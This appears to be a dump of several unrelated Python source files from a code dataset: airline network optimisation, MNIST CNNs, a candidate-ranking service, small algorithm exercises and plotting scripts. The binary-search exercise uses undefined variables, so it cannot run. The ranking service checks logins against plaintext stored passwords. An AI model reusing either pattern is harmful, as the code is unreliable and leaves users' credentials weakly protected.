edge_data['data']['type'] > k_type)\n or (k_type == 2 and edge_data['data']['type'] != k_type)\n )\n and i_airport != j_airport\n )\n and i_airport != 'Source'\n and j_airport != 'Sink'\n ):\n edges_to_remove.append(edge[0:2])\n count += 1\n G.remove_edges_from(edges_to_remove)\n log.info('Removed {}/{} edges.'.format(count, number_edges))\n return G\n\n def _edge_weight(self, i, j, edge_data={}):\n \"\"\"\n Weight function for edge between two pair of nodes.\n\n Parameters\n ----------\n i : string,\n tail node in the form 'LETTER_INTEGER'\n\n j : string,\n head node in the form 'LETTER_INTEGER'\n\n Returns\n -------\n int\n value with appropriate weight\n \"\"\"\n if i == 'Source':\n return 0 # float(j.split('_')[1])\n elif j == 'Sink':\n return 0 # (self.last_arr - float(i.split('_')[1]))\n else:\n i_airport, i_time = i.split('_')\n j_airport, j_time = j.split('_')\n i_time, j_time = float(i_time), float(j_time)\n # if i_airport == j_airport:\n # return (j_time - i_time)\n # else:\n if self.k_make:\n try: # SCHEDULED CONNECTION\n flight_dual = list(\n w[0]\n for w in self.duals\n if w[1]._full_dict() == edge_data['data'])[0]\n cost = (OPERATING_COSTS[self.k_make]['standard']\n if i_airport != j_airport else 0)\n return cost * (j_time - i_time) - flight_dual\n except IndexError: # NON-SCHEDULED CONNECTION\n cost_delay, delay = 0, 0\n if i_airport != j_airport:\n closest_flight = self._get_flight_copy(\n self.flights, edge_data)\n delay = (edge_data['data']['departure'] -\n closest_flight.departure)\n flight_dual = list(w[0]\n for w in self.duals\n if w[1]._full_dict() ==\n closest_flight._full_dict())[0]\n cost = OPERATING_COSTS[self.k_make]['standard']\n cost_delay = OPERATING_COSTS[self.k_make]['copy']\n return (cost * (j_time - i_time) + cost_delay * delay -\n flight_dual)\n else:\n return (OPERATING_COSTS[self.k_make]['ground'] *\n (j_time - i_time))\n else:\n return 0\n\n @staticmethod\n def _get_flight_copy(flights, edge_data):\n previous_flights = [f for f in flights if (\n f._full_dict()['origin'] == edge_data['data']['origin'] and\n f._full_dict()['destination'] == edge_data['data']['destination']\n and f._full_dict()['departure'] < edge_data['data']['departure'])]\n if previous_flights:\n return max(previous_flights, key=lambda x: x.departure)\n else:\n return\n\n def _update_edge_attrs(self, edge):\n \"\"\"\n Update edge attributes using dual values from the solution of the\n relaxed master problem.\n\n Parameters\n ----------\n edge : edge\n edge to update.\n\n it : int\n iteration number.\n\n duals : list of tuples\n (dual, classes.Flight). dual values from the master problem\n and schedule.\n\n first_flight : object, :class:`classes.Flight`\n first flight scheduled.\n \"\"\"\n\n def __update_weight(edge):\n edge_data = edge[2]\n weight = self._edge_weight(*edge)\n edge_data['weight'] = weight\n\n def __update_res_cost(edge):\n edge[2]['res_cost'] = np.zeros(self.G.graph['n_res'])\n\n __update_weight(edge)\n __update_res_cost(edge)\n","sub_path":"examples/cgar/time_space_network.py","file_name":"time_space_network.py","file_ext":"py","file_size_in_byte":13072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"396482737","text":"import re\nimport ast\nfrom setuptools import setup\nfrom helium.version import __version__\n\nwith open('README.rst') as file:\n long_description = file.read()\n\nsetup(\n name='helium-commander',\n version=__version__,\n url='http://github.com/helium/helium-commander/',\n license='BSD',\n author='Marc Nijdam',\n author_email='marc@helium.com',\n description='A CLI and service wrapper for the Helium API',\n long_description=long_description,\n packages=['helium', 'helium.commands'],\n platforms='all',\n install_requires=[\n 'future>=0.15',\n 'requests>=2.9',\n 'dpath>=1.4',\n 'futures>=3.0',\n 'terminaltables>=2.1.0',\n 'click>=6.6',\n 'unicodecsv>=0.14.1',\n ],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n \"Topic :: Utilities\",\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ],\n entry_points='''\n [console_scripts]\n helium=helium.cli:main\n '''\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"170859654","text":"class Solution:\n \"\"\"\n @param nums: An integer array sorted in ascending order\n @param target: An integer\n @return: An integer\n \"\"\"\n def lastPosition(self, nums, target):\n # write your code here\n if len(nums) == 0 or nums==None:\n return -1\n \n # [1,1] target = 1\n # start = 0, end = 1\n # mid = (start + end) // 2 = 0\n \n #while start < end: # X\n while start + 1 < end: \n mid = (start + end)//2\n if target >= nums[mid]:\n start = mid # mid might be the last position\n #elif target > mid:\n # start = mid\n else:\n end = mid\n \n if nums[end] == target:\n return end\n if nums[start] == target:\n return start\n\n return -1","sub_path":"binary_search/458l.py","file_name":"458l.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"543907835","text":"\"\"\"\nCreated on Nov 29, 2013\n\n@author: be07336\n\"\"\"\n\nfrom model.candidate import Candidate, Evaluation, Evaluator, Criterion, Ranking\nfrom model.connection import ConnectionManager\nimport utilities\n\n\nclass Service(object):\n\n @staticmethod\n def list_to_dict(key_function, values):\n new_dict = dict((key_function(v), v) for v in values)\n for i in range(1, 6):\n if not new_dict.get(i):\n new_eval = Evaluation()\n new_eval.criterion = i\n new_eval.grade = 0\n new_dict.__setitem__(i, new_eval)\n return new_dict\n\n @staticmethod\n def all_candidates():\n session = ConnectionManager.get_instance().get_session()\n result = session.query(Candidate).order_by(Candidate.id)\n session.close()\n return result\n\n @staticmethod\n def get_progress(evaluator_id=None):\n if not evaluator_id:\n return 0\n\n session = ConnectionManager.get_instance().get_session()\n evaluated = session.execute(\"\"\"\n SELECT COUNT(*) FROM candidate WHERE id IN (\n SELECT candidate FROM ranking WHERE ranking is not null AND ranking <> 999 AND evaluator=:evaluator_id)\"\"\",\n {'evaluator_id': evaluator_id}).fetchone()[0]\n total = session.execute(\"\"\"SELECT COUNT(*) FROM candidate\"\"\").fetchone()[0]\n return int(evaluated * 1.0 / total * 100)\n\n @staticmethod\n def get_candidate(candidate_id=None):\n if not candidate_id:\n raise ValueError(\"The id of the candidate cannot be null!\")\n session = ConnectionManager.get_instance().get_session()\n rows = session.query(Candidate).filter(Candidate.id == candidate_id)\n # session.close()\n print(rows)\n try:\n return rows[0]\n except:\n return None\n\n @staticmethod\n def get_evaluations(candidate_id=None, evaluator_id=None):\n if not candidate_id or not evaluator_id:\n raise ValueError(\"The id of the candidate or the id of the evaluator cannot be None!\")\n session = ConnectionManager.get_instance().get_session()\n rows = session.query(Evaluation) \\\n .filter(Evaluation.candidate == candidate_id, Evaluation.evaluator == evaluator_id) \\\n .order_by(Evaluation.criterion)\n rows_dictionary = Service.list_to_dict(lambda evaluation: evaluation.criterion, rows)\n session.close()\n return rows_dictionary\n\n @staticmethod\n def save_evaluations(evaluations=None):\n if not evaluations or not isinstance(evaluations, list):\n return\n\n session = ConnectionManager.get_instance().create_session()\n for evaluation in evaluations:\n session.merge(evaluation)\n try:\n session.commit()\n print('Commited!')\n except:\n print('Exception!!!!')\n session.rollback()\n raise\n finally:\n session.close()\n\n @staticmethod\n def save_ranking(ranking=None):\n if not ranking:\n return\n session = ConnectionManager.get_instance().create_session()\n session.merge(ranking)\n try:\n print('Ranking:', ranking.ranking, 'evaluator', ranking.evaluator, 'candidate', ranking.candidate)\n session.commit()\n except:\n session.rollback()\n raise\n finally:\n session.close()\n\n @staticmethod\n def report_for_candidate(candidate_id=None):\n if not candidate_id:\n raise ValueError(\"Cannot generate a report for a non-defined user...\")\n # TODO: complete and returns a report for the candidate\n return 1\n\n @staticmethod\n def get_evaluator(evaluator_password=None, evaluator_email=None):\n if not evaluator_email:\n raise ValueError(\"Email is required to perform search\")\n session = ConnectionManager.get_instance().get_session()\n rows = session.query(Evaluator).filter(Evaluator.email == evaluator_email,\n Evaluator.password == evaluator_password)\n\n session.close()\n try:\n return rows[0]\n except:\n return None\n\n @staticmethod\n def get_ranking(evaluator_id=None, candidate_id=None):\n if not evaluator_id or not candidate_id:\n raise ValueError\n session = ConnectionManager.get_instance().get_session()\n rows = session.query(Ranking).filter(Ranking.evaluator == evaluator_id, Ranking.candidate == candidate_id)\n try:\n return rows[0]\n except:\n return 999\n\n @staticmethod\n def get_user(user_email):\n if not user_email:\n return None\n session = ConnectionManager.get_instance().get_session()\n rows = session.query(Evaluator).filter(Evaluator.email == user_email)\n # session.close()\n try:\n return rows[0]\n except:\n return None\n\n @staticmethod\n def get_criteria():\n return ConnectionManager.get_instance().get_session().query(Criterion).order_by(Criterion.id).all()\n\n @staticmethod\n def get_missing_evaluators():\n session = ConnectionManager.get_instance().get_session()\n rows = session.execute(\"\"\"\n SELECT name, email FROM evaluator WHERE id NOT IN (\n SELECT evaluator\n FROM ranking\n WHERE ranking is not null AND ranking <> 999\n GROUP BY evaluator\n HAVING COUNT(ranking) >= 12) AND id <> 0 \"\"\")\n result_list = []\n for row in rows:\n result_list.append(dict(row))\n return result_list\n\n @staticmethod\n def get_ranking_result():\n session = ConnectionManager.get_instance().get_session()\n rows = session.execute(\"\"\"\n SELECT c.name AS NAME, SUM(13 - r.ranking) AS RANKINGSUM, AVG(r.ranking) AS AVERAGERANKING,\n COUNT(r.ranking) AS COUNTRANKING\n FROM ranking r JOIN candidate c ON c.id = r.candidate\n WHERE ranking is not null AND ranking <> 999\n GROUP BY c.name\n ORDER BY RANKINGSUM DESC\n \"\"\")\n result_list = []\n for row in rows:\n result_list.append(dict(row))\n return result_list\n\n @staticmethod\n def get_criteria_average():\n session = ConnectionManager.get_instance().get_session()\n rows = session.execute(\"\"\"\n SELECT c.id, c.name, e.criterion, round(avg(e.grade),3) AS AVERAGE\n FROM evaluation e JOIN candidate c ON c.id=e.candidate\n GROUP BY c.id, c.name, e.criterion\n ORDER BY c.id, e.criterion\n \"\"\")\n result_list = utilities.result_set_to_dict(rows)\n result_map = dict()\n for a_dict in result_list:\n if not a_dict['NAME'] in result_map:\n result_map.update({a_dict['NAME']: {a_dict['CRITERION']: a_dict['AVERAGE']}})\n else:\n result_map[a_dict['NAME']].update({a_dict['CRITERION']: a_dict['AVERAGE']})\n return result_map\n\n @staticmethod\n def get_system_ranking():\n session = ConnectionManager.get_instance().get_session()\n rows = session.execute(\"\"\"\n SELECT SUM(ponderation) AS RANKING, ID, NAME\n FROM (\n SELECT candidate AS ID, c.name AS NAME, crit.weight/100.0 * AVG(grade) as ponderation\n FROM evaluation e JOIN candidate c ON c.id = candidate JOIN criterion crit ON crit.id = e.criterion\n GROUP BY criterion, candidate, crit.weight\n )\n GROUP BY ID, NAME\n ORDER BY RANKING DESC\n \"\"\")\n return utilities.result_set_to_dict(rows)\n","sub_path":"src/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":7788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"76832084","text":"from pandas import read_csv\r\nfrom os import path\r\n\r\n\r\ndef vehicle_fetch(csv_filename):\r\n assert path.splitext(csv_filename)[1][1:] == 'csv' or 'ascii', 'function takes a name of csv file'\r\n reader = read_csv(csv_filename, sep=';')\r\n car_params = {}\r\n names = reader.columns.tolist()\r\n for _ in names:\r\n car_params[_] = list(reader[_])\r\n return car_params\r\n\r\n# print(vehicle_fetch('car_table.csv'))\r\n","sub_path":"vehicle/resources/csvreader.py","file_name":"csvreader.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"18064472","text":"import os\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nfrom cnn_utils import train_test_split\n\nsrc = 'Dataset/PetImages/'\n\n# Controlla che il dataset sia stato scaricato\nif not os.path.isdir(src):\n print(\"\"\"Dataset non presente nel computer.\"\"\")\n quit()\n\n# Crea le cartelle Train e Test se non esistono\nif not os.path.isdir(src+'train/'):\n train_test_split(src)\n\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Dropout, Flatten, Dense\nfrom keras.preprocessing.image import ImageDataGenerator\n\n# Definizione HYPERPARAMETERS\nFILTER_SIZE = 3 # grandezza del filtro per le convoluzioni (in questo caso 3x3)\nNUM_FILTERS = 32 # il numero di filtri utilizati\nINPUT_SIZE = 32 # numero di pixel per la compressione dell'immagine (in questo caso 32x32), ci sarà perdita di informazione ma aumento delle prestazioni generali\nMAXPOOL_SIZE = 2 # grandezza per max pooling (in questo caso 2x2, dimezzerà l'input del layer precendente)\nBATCH_SIZE = 16 # numero dei training samples da usare in ogni mini batch durante la gradient descent. Più aumenta più aumenta l'accuratezza, ma aumenta anche il tempo per il training\nSTEPS_PER_EPOCH = 20000//BATCH_SIZE # numero di iterazioni per training epoch\nEPOCHS = 10 # numero di epoch per effettuare il training sui dati\n\n# creazione del modello sequenziale\nmodel = Sequential()\n\n# aggiunta del primo convolutional layer\nmodel.add(Conv2D(NUM_FILTERS, (FILTER_SIZE, FILTER_SIZE), input_shape = (INPUT_SIZE, INPUT_SIZE, 3), activation = 'relu')) # 'relu' serve a specificare ReLU come funzione di attivazione\n# aggiunta del primo max pooling layer\nmodel.add(MaxPooling2D(pool_size = (MAXPOOL_SIZE, MAXPOOL_SIZE)))\n\n# aggiunta del secondo convolutional layer\nmodel.add(Conv2D(NUM_FILTERS, (FILTER_SIZE, FILTER_SIZE), activation = 'relu'))\n# aggiunta del secondo max pooling layer\nmodel.add(MaxPooling2D(pool_size = (MAXPOOL_SIZE, MAXPOOL_SIZE)))\n\nmodel.add(Flatten()) # funzione che trasforma un vettore multidimensionale in un vettore a singola dimensione\n# aggiunta del primo fully connected layer\nmodel.add(Dense(units = 128, activation = 'relu')) # creazione di 128 nodi e funzione di attivazione ReLU\n\n# aggiunta del dropout layer\nmodel.add(Dropout(0.5))\n# aggiunta del secondo fully connected layer\nmodel.add(Dense(units = 1, activation = 'sigmoid')) # creazione di 1 nodo e 'sigmoid' specifica la Sigmoid function come funzione di attivazione\n\n# compilazione del modello\nmodel.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\n\ntraining_data_generator = ImageDataGenerator(rescale = 1./255)\ntesting_data_generator = ImageDataGenerator(rescale = 1./255)\n\n# training sulla cartella /Train\ntraining_set = training_data_generator.flow_from_directory(src+'Train/',\n target_size = (INPUT_SIZE, INPUT_SIZE),\n batch_size = BATCH_SIZE,\n class_mode = 'binary')\n# testing sulla cartella /Test\ntest_set = testing_data_generator.flow_from_directory(src+'Test/',\n target_size = (INPUT_SIZE, INPUT_SIZE),\n batch_size = BATCH_SIZE,\n class_mode = 'binary')\n\nmodel.fit_generator(training_set, steps_per_epoch = STEPS_PER_EPOCH, epochs = EPOCHS, verbose=1)\n\nscore = model.evaluate_generator(test_set, steps=100)\n\nfor idx, metric in enumerate(model.metrics_names):\n print(\"{}: {}\".format(metric, score[idx]))\n","sub_path":"main_basic_cnn.py","file_name":"main_basic_cnn.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"567134878","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.utils.data as Data\nimport torchvision\n# import sys\n# import os\n#\n# # sys.path.append(os.path.curdir)\n\n\nclass CNN(nn.Module):\n def __init__(self):\n super(CNN, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(\n in_channels=1,\n out_channels=16,\n kernel_size=5,\n padding=2, # if stride=1, padding=(kernel_size - 1) /2 = (5 -1)/2\n ), # -> (16, 28, 28)\n nn.ReLU(), # -> (16, 28, 28)\n nn.MaxPool2d(kernel_size=2), # -> (16, 14, 14)\n )\n self.conv2 = nn.Sequential(\n nn.Conv2d(16, 32, 5, 1, 2), # -> (32, 14, 14)\n nn.ReLU(), # -> (32, 14, 14)\n nn.MaxPool2d(2) # -> (32, 7, 7)\n )\n self.out = nn.Linear(32 * 7 * 7, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x) # (batch, 32, 7, 7)\n x = x.view(x.size(0), -1) # (batch, 32 * 7 * 7)\n output = self.out(x)\n return output\n\n\ndef test():\n test_data = torchvision.datasets.MNIST(root='../mnist/', train=False)\n # shape from (2000, 28,28) to (2000, 1, 28,28), value in range(0, 1)\n test_x = Variable(torch.unsqueeze(test_data.data, dim=1)).type(torch.FloatTensor)[0] / 255.\n test_x1 = Variable(torch.unsqueeze(test_data.data, dim=1))[0]\n print(\"test_x1:\", test_x1)\n print(\"test_x1.shape:\", test_x1.shape)\n\n\ndef get_test_x():\n test_data = torchvision.datasets.MNIST(root='../mnist/', train=False)\n # shape from (2000, 28,28) to (2000, 1, 28,28), value in range(0, 1)\n var = Variable(torch.unsqueeze(test_data.data, dim=1)).type(torch.FloatTensor)[:10] / 255.\n return var\n\n\ndef train_net():\n # Hyper Parameters\n EPOCH = 1\n BATCH_SIZE = 50\n LR = 0.001\n DOWNLOAD_MNIST = False\n train_data = torchvision.datasets.MNIST(\n root='../mnist',\n train=True,\n transform=torchvision.transforms.ToTensor(), # (0, 1) (0-255)\n download=DOWNLOAD_MNIST\n )\n\n train_loader = Data.DataLoader(dataset=train_data, batch_size=BATCH_SIZE, shuffle=True, num_workers=2)\n\n test_data = torchvision.datasets.MNIST(root='../mnist/', train=False)\n # shape from (2000, 28,28) to (2000, 1, 28,28), value in range(0, 1)\n test_x = Variable(torch.unsqueeze(test_data.test_data, dim=1), volatile=True).type(torch.FloatTensor)[:2000] / 255.\n test_y = test_data.test_labels[:2000]\n\n cnn = CNN()\n optimizer = torch.optim.Adam(cnn.parameters(), lr=LR)\n loss_func = nn.CrossEntropyLoss()\n\n for epoch in range(EPOCH):\n for step, (x, y) in enumerate(train_loader):\n # b_x = Variable(x)\n # b_y =\n output = cnn(x)\n loss = loss_func(output, y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if step % 50 == 0:\n test_output = cnn(test_x)\n pred_y = torch.max(test_output, 1)[1].data.squeeze()\n accuracy = sum(pred_y == test_y) / test_y.size(0)\n # accuracy = float((pred_y == test_y.data.numpy()).astype(int).sum())/ float(test_y.size(0))\n # print('training pred_y', pred_y, ' sum of matches: ',\n # float((pred_y == test_y.data.numpy()).astype(int).sum()))\n # print('training test_y', test_y, 'test_y.size(0)', test_y.size(0))\n\n print('Epoch: ', epoch, '| train loss: %.4f' % loss.data.numpy(), '| test accuracy: %.2f' % accuracy)\n\n test_output = cnn(test_x[:10])\n pred_y = torch.max(test_output, 1)[1].data.numpy().squeeze()\n torch.save(cnn, \"cnn.pkl\")\n torch.save(cnn.state_dict(), \"cnn_params.pkl\")\n print(pred_y, 'prediction number')\n print(test_y[:10].numpy(), 'real number')\n","sub_path":"hand_writing/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"413416775","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport matplotlib.pyplot as plt,time\nimport numpy as np\n\n# 绘制普通图像\nscan=[]\n\n\nwith open(r\"SCAN.txt\",\"r\") as f2:\n data2=f2.readlines()\n\nfor line in data2:\n scan.append(int(line.split()[0]))\n#X轴,Y轴数据 \n#plt.figure(figsize=(10,6)) #创建绘图对象 \nfor i in range(12):\n \n plt.ion()\n plt.clf()\n # X, =plt.plot(sstf[:i+1],list(range(1, len(sstf[:i+1]) + 1)),\"b*-\",linewidth=1) #在当前绘图对象绘图(X轴,Y轴,线类型,线宽度) \n X=plt.plot(scan[:i+1],list(range(1, len(scan[:i+1]) + 1)),\"ro-\",linewidth=1)\n \n #time.sleep(1)\n plt.xlabel(\"disk_sequence\") #X轴标签 \n plt.ylabel(\"time\") #Y轴标签 \n plt.title(\"disk_schedule\",fontsize='large',fontweight='bold',color='blue') #图标题 \n plt.legend(X, 'scan')\n# plt.legend([X, Y], ['sstf', 'scan'])\n plt.pause(0.5)\n # plt.figure()\n# plt.show() #显示图 \n plt.ioff()\n ","sub_path":"4.磁盘调度算法/SCAN.py","file_name":"SCAN.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"536184737","text":"import numpy as np\nimport matplotlib.pylab as plt\n\nnames = ['Taxi', 'UberX', 'Drive & Park', 'Car2Go (if I could park it!)', 'Bus & Rail']\ncosts = [71, 42, 37, 12, 5.5]\ntimes = [40,40,40,30,78]\nptcolors = ['yellow', 'black', 'red', 'blue', 'green']\n\nxoffs = [-20,-20,90,90,-20]\nyoffs = [0,0,0,-30,0]\n\nfig = plt.figure()\nax=fig.add_subplot(111)\nfor x,y,c in zip(times, costs,ptcolors):\n ax.plot(x,y,color=c, marker='o', markersize=12)\nax.set_xlabel('Time (minutes)')\nax.set_ylabel('Cost ($)')\nax.set_title('Getting To the Airport')\nax.set_xlim([20,80])\n\nfor label,x,y,c,xoff,yoff in zip(names,times,costs, ptcolors,xoffs,yoffs):\n ax.annotate(label, xy=(x,y), xytext=(xoff,yoff),\n textcoords = 'offset points', ha = 'right', va = 'bottom',\n bbox = dict(boxstyle = 'round,pad=0.5', fc = c, alpha = 0.1)\n )\n\n\n\nplt.savefig('options.png')\n#plt.show()\n","sub_path":"blargh/Posts/Ride2Airport/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"511832811","text":"def getaction():\n laction = []\n while True:\n laction.append(str(input('Action (Boost|Dodge|Focus|Roll|Target): ')))\n vbreak = input(str('Is it the end of actions (s/n) ? '))\n print('')\n if vbreak == 's' or vbreak == 'S':\n break\n return laction\n\n\ndef getimprovement():\n limprovement = []\n while True:\n limprovement.append(str(input('Improvement (Elit Pilot|Torpedos|Astromech): ')))\n vbreak = input(str('Is it the end of improvements (s/n) ? '))\n print('')\n if vbreak == 's' or vbreak == 'S':\n break\n return limprovement\n\n\ndef getpilot():\n vname = str(input('Name: '))\n vskillpoint = int(input('Skill: '))\n vattackdice = int(input('Attack: '))\n vdefensedice = int(input('Defense: '))\n vhull = int(input('Hull: '))\n vshield = int(input('Shield: '))\n laction = getaction()\n limprovement = getimprovement()\n vtotalpoints = int(input('Total points: '))\n dpilot = {'name': vname, 'skill': vskillpoint, 'attack': vattackdice, 'defense': vdefensedice, 'hull': vhull,\n 'shield': vshield, 'action': laction, 'improvement': limprovement, 'points': vtotalpoints}\n return dpilot\n\ndef getsquadron(vclass):\n lsquadron = []\n while True:\n lsquadron.append(getpilot())\n vbreak = input(str('Is it the end of pilots (s/n) ? '))\n print('')\n if vbreak == 's' or vbreak == 'S':\n break\n return lsquadron\n\n\nlsquad1 = getsquadron('Rebel')\nlsquad2 = getsquadron('Imperial')\n\nprint(lsquad1)\nprint(lsquad2)","sub_path":"Genericos/x-wing.py","file_name":"x-wing.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"96373536","text":"'''\nCreated on 27 Mar 2014\n\n@author: vnicolao\n'''\nimport unittest\nfrom os import path\n\nfrom comp61542.database.database import Publication, Database, Author\n\nfrom comp61542.statistics import utils\nimport comp61542\n\nclass TestAuthorStats(unittest.TestCase):\n\n def setUp(self):\n directory, _ = path.split(__file__)\n data = \"dblp_curated_sample.xml\"\n comp61542.app.config['TESTING'] = True\n comp61542.app.config['DATASET'] = data\n db = Database()\n db.read(path.join(directory, \"..\", \"data\", data))\n comp61542.app.config['DATABASE'] = db\n \n self.app = comp61542.app.test_client()\n self.db = db\n\n def test_that_db_calculates_number_of_publications_for_authors(self):\n self.db.calculate(\"Roberto Elli\")\n author = self.db.getAuthor(\"Roberto Elli\")\n self.assertEquals(author.conference_papers, 1)\n self.assertEquals(0, author.journal_papers)\n self.assertEquals(0, author.book_chapters)\n self.assertEquals(0, author.books)\n self.assertEquals(1, author.total_papers())\n\n self.db.calculate(\"Alon Y. Halevy\")\n author = self.db.getAuthor(\"Alon Y. Halevy\")\n self.assertEqual(72, author.conference_papers)\n self.assertEqual(4, author.book_chapters)\n self.assertEqual(62, author.journal_papers)\n self.assertEqual(1, author.books)\n self.assertEquals(139, author.total_papers())\n\n\n def test_that_db_calculates_number_of_publications_for_authors_as_first_author(self):\n self.db.calculate(\"Alon Y. Halevy\")\n author = self.db.getAuthor(\"Alon Y. Halevy\")\n PublicationType = [\n \"Conference Paper\", \"Journal\", \"Book\", \"Book Chapter\"]\n self.assertEqual(8, author.first[PublicationType[0]])\n self.assertEqual(0, author.first[PublicationType[3]])\n self.assertEqual(6, author.first[PublicationType[1]])\n self.assertEqual(0, author.first[PublicationType[2]])\n self.assertEqual(14, author.first[\"overall\"])\n\n def test_that_db_calculates_number_of_publications_for_authors_as_last_author(self):\n self.db.calculate(\"Alon Y. Halevy\")\n author = self.db.getAuthor(\"Alon Y. Halevy\")\n PublicationType = [\n \"Conference Paper\", \"Journal\", \"Book\", \"Book Chapter\"]\n self.assertEqual(25, author.last[PublicationType[0]])\n self.assertEqual(2, author.last[PublicationType[3]])\n self.assertEqual(18, author.last[PublicationType[1]])\n self.assertEqual(0, author.last[PublicationType[2]])\n self.assertEqual(45, author.last[\"overall\"])\n \n def test_that_db_calculates_number_of_publications_for_authors_as_sole_author(self):\n self.db.calculate(\"Alon Y. Halevy\")\n author = self.db.getAuthor(\"Alon Y. Halevy\")\n PublicationType = [\n \"Conference Paper\", \"Journal\", \"Book\", \"Book Chapter\"]\n self.assertEqual(10, author.sole[PublicationType[0]])\n self.assertEqual(2, author.sole[PublicationType[3]])\n self.assertEqual(7, author.sole[PublicationType[1]])\n self.assertEqual(0, author.sole[PublicationType[2]])\n self.assertEqual(19, author.sole[\"overall\"])\n \n def test_that_db_calculates_number_of_coauthors_for_author(self):\n self.db.calculate(\"Alon Y. Halevy\")\n author = self.db.getAuthor(\"Alon Y. Halevy\")\n self.assertEquals(195, author.coauthors)\n \nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.test_that_']\n unittest.main()","sub_path":"test/test_calculating_stats.py","file_name":"test_calculating_stats.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"129027108","text":"'''\n=> Modified Quick Sort\nNotice the special modification we have on line 29, we want a strict distribution that all the color that is smaller than or equal to pivot will appear on left, otherwise right.\nThis way we will not have dead loop\nTime: O(nlogk)\nSpace: O(logk)\n'''\nclass Solution:\n \"\"\"\n @param colors: A list of integer\n @param k: An integer\n @return: nothing\n \"\"\"\n def sortColors2(self, colors, k):\n # write your code here\n self.quick_sort(colors, 0, len(colors) - 1, 1, k)\n \n def quick_sort(self, colors, start, end, colorFrom, colorTo):\n if colorFrom >= colorTo:\n return\n \n if start >= end:\n return\n \n pivot = colorFrom + (colorTo - colorFrom) // 2\n \n l, r = start, end\n while l <= r:\n while l <= r and colors[l] <= pivot:\n l += 1\n while l <= r and colors[r] > pivot:\n r -= 1\n \n if l <= r:\n colors[l], colors[r] = colors[r], colors[l]\n l += 1\n r -= 1\n \n self.quick_sort(colors, start, r, colorFrom, pivot)\n self.quick_sort(colors, l, end, pivot + 1, colorTo)\n\n\n\n ","sub_path":"143_sort-colors-2/sort-colors-2.py","file_name":"sort-colors-2.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"564437042","text":"import math\n\n\ndef main():\n A, B, H, M = map(int, input().split())\n PI = math.pi\n\n # Hour\n h_deg = 360 - 360 * (H + M / 60) / 12 + 90.0\n h_rad = h_deg * PI / 180.0\n # print(h_deg)\n h_x, h_y = A * math.cos(h_rad), A * math.sin(h_rad)\n # print(h_x, h_y)\n\n # Minute\n m_deg = 360 - 360 * (M / 60) + 90.0\n m_rad = m_deg * PI / 180.0\n # print(m_deg)\n m_x, m_y = B * math.cos(m_rad), B * math.sin(m_rad)\n # print(m_x, m_y)\n\n print(math.sqrt((h_x - m_x)**2 + (h_y - m_y)**2))\n\n\nmain()\n","sub_path":"abc/abc168c.py","file_name":"abc168c.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"594129743","text":"from collections import Counter\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport re\r\nfrom nltk.tokenize import RegexpTokenizer\r\nfrom stop_words import get_stop_words\r\nfrom nltk.stem.porter import PorterStemmer\r\n\r\nimport math\r\n\r\nimport sys\r\n\r\n\r\ntokenizer = RegexpTokenizer(r'\\w+')\r\n\r\n# create English stop words list\r\nen_stop = get_stop_words('en')\r\n\r\n# Create p_stemmer of class PorterStemmer\r\np_stemmer = PorterStemmer()\r\n \r\n\r\nclass LDA:\r\n\r\n def process(url, kwd):\r\n kwd = kwd.lower()\r\n tokens = tokenizer.tokenize(kwd)\r\n # remove stop words from tokens\r\n stopped_tokens = [i for i in tokens if not i in en_stop]\r\n # stem tokens\r\n stemmed_tokens = [p_stemmer.stem(i) for i in stopped_tokens]\r\n # add tokens to list\r\n keytokens = stemmed_tokens\r\n #print(keytokens)\r\n\r\n #print('***********' + kwd)\r\n d = 0\r\n try:\r\n\r\n print(\"in process\", url)\r\n # kwd= \"python java\"\r\n html = \"\"\r\n text = \"\"\r\n try:\r\n html = requests.get(url).content\r\n # 1 Recoding\r\n unicode_str = 